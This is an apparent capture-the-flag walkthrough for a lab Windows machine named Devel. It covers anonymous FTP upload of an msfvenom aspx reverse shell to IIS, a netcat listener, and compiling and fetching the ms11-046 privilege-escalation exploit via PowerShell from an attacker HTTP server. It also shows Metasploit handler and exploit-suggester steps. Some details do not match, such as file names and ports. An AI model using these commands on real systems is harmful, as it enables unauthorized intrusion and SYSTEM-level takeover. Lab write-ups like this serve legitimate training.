Devel
Last updated
Was this helpful?
Last updated
Was this helpful?
one line summary without msf :-: ftp(anonymous login) -->put aspx rev shell-->execute from IIS -->gain access-->whoami /priv --> SETokenimpersonate --> printspoof exploit --> rooted
1line summary [with msf] :-: ftp(anonymous login) -->put aspx meterpreter rev shell-->execute from IIS -->gain access(meterpreter)-->msf local exploit suggestor-->try available exploits -->rooted
I have a habit of running scans in phases and them in sequences like scan1 scan2.
First Scan I ran was a full port scan; saved as file named scan1
nmap -p- -n -vvv -oN nmap/scan1 10.10.10.5
Second scan i ran for specific ports; saved as file named scan2
sudo nmap -p80,21 -sCV -oN nmap/scan2 10.10.10.5
Port 80 IIS running
Port 21 ftp is running
ftp $ip
Succesfully logged in with anonymous login.
upload a file to ftp access it through browser to confirm
google search more about iis versions iis version 7.5 -- 2008 R2
Little bit about asp vs aspx
asp are vb script based
aspx are .net based
if the IIS was of 2003 or before I would have used asp based payload because it's old and only supports asp vb scripts whereas IIS 2008 is relatively recent and is .net based. So I'll go with aspx
msfvenom -p windows/shell_reverse_tcp LHOST=youriphere LPORT=4444 -f aspx -o rks.aspx
Login to ftp and upload the payload using put command
put secShark.aspx
execute the shell from bowser
get a shell back
nc -nvlp 1669
whoami /priv
you can see the SeTokenImpersonate is Enabled
read more about this vuln. here ::-
I will use printspoofer to exploit this vuln and escalate my priv to NTAuthority\System
whoami iss apppool\web
systeminfo
gives you windows system related info for priv esc and local enum
info to look for ?? hotfixs architecture and os version
searchsploit -u // to update the searchsploit database
google windows 7 7600 32 bit arch or windows 7 x86 exploit
found:: ms11-046 for Priv Esc I copied the edb id and searched in searchsploit
searchsploit -m 40564
If you don’t have mingw-w64 installed, install it.
apt-get install mingw-w64
to compile the exploit use below menitoned command
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
on attacker machine start a http server python -m SimpleHTTPServer 80 Download exe using powershell
run the exploit 40564.exe
Check user whoami nt auth \system
rooted
Generate meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=youriphere LPORT=yourlisteningport -f aspx -o rks.aspx
I am being carefull with the payload selection as 64 bit payload is not going to work if the target is 32 bit 32 bit is the safest one to choose initially as 32 bit is going to work on 64 bit machine as well.
msfconsole
use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost tun0
set lport
run
execute the shell from bowser and get a shell back
sysinfo
check if the architecture matches with the payload you used -- if not change your payload to target arch. and redo the above steps.
ctrl Z to background the session
search suggest looking for local exploit suggestor
use post/multi/recon/exploit_suggestor
session -l
set session 1
it is going to check for bunch of potential exploits available for this machine and provide you with the list
select one out of them and load it .
use exploit/....
show options
set session 1
set lhost tun0
run
powershell -c "(new-object System.Net.WebClient).DownloadFile(', 'c:\Users\Public\Downloads\40564.exe')"